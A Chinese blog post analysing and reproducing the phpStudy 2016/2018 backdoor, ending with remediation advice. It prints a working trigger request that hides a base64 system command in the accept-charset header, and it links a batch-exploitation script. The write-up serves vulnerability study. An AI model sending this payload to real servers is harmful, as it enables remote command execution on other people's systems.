美文网首页
phpstudy后门分析与复现

phpstudy后门分析与复现

作者: 君行路 | 来源:发表于2019-09-28 20:19 被阅读0次

小白白也要复现!

phpstudy简介

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。

威胁等级:<font color="red">严重</font>
影响范围:phpstudy2016版、2018版
后门类型:C&C、命令执行
利用难度:极易

目前已知受影响的phpstudy版本:

  • phpstudy 2016版php-5.4
  • phpstudy 2018版php-5.2.17
  • phpstudy 2018版php-5.4.45

后门模块分析

含后门的模块位置:\ext\php_xmlrpc.dll,至少在两个版本中存在该后门。

快速判断该模块中是否存在后门方法:记事本打开该.dll文件,搜索eval字符串,显示如下结果:

后门包:

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
accept-charset: c3lzdGVtKCd3aG9hbWknKTs=/*这里就是要执行的命令base64加密*/
Connection: close
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

复现过程

开启我的phpstudy
哦豁,火绒是真的nb,病毒库更新这么迅速

但火绒未免也太小气了,病毒竟然命名为FakeStudy
phpstudy用的还是很舒服的。

添加一下信任区,继续我的复现之旅。

发个包过去瞅瞅:



哦豁,完蛋,我号没了:(


自动化利用

上面那样利用还是不够爽,写个python自动化脚本吧
批量利用脚本链接:https://www.cnblogs.com/-qing-/p/11575622.html

脚本演示:



工具一把梭就是舒服,脚本小子实锤了。

修复建议

  • 删除存在后门的模块
  • 更新phpstudy到最新的2019版本
  • 卸载phpstudy

相关文章

  • phpstudy后门分析与复现

    小白白也要复现! phpstudy简介 phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apa...

  • phpstudy后门复现

    ps:当时出的时候就复现了,但是由于种种原因(当初粗心,没好好留意)没有成功,今天终于成功了 目前已知受影响的ph...

  • phpstudy后门漏洞复现

    phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP...

  • phpStudy漏洞复现

    漏洞简介 关于phpStudy的后门漏洞可参考https://blog.csdn.net/weixin_43886...

  • phpstudy后门验证方式

    GET / HTTP/1.1 Host: 0.0.0.0 User-Agent: Mozilla/5.0 (Win...

  • phpstudy后门利用方式

    随意访问任何一个文件 0x01 Accept-Encoding字段中,gzip和deflate之间的逗号后的空格去...

  • PHPStudy后门利用方法

    漏洞版本Phpstudy 2016版 php-5.4Phpstudy 2018版 php-5.2.17Phps...

  • 粘滞键后门攻击复现

    最近跟着大佬的博客复现了下粘滞键后门的攻击场景,这里做个记录。 环境 Windows 10 概念&原理 粘滞键[h...

  • Phpstudy隐藏后门2019-09-24

    1.事件背景 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、My...

  • CSRF+表单自动提交

    下载bWAPP这个实验环境,这个是使用php的环境用phpstudy就能很简单的搭建了(其他的版本有后门,还请用新...

网友评论

      本文标题:phpstudy后门分析与复现

      本文链接:https://www.haomeiwen.com/subject/mctouctx.html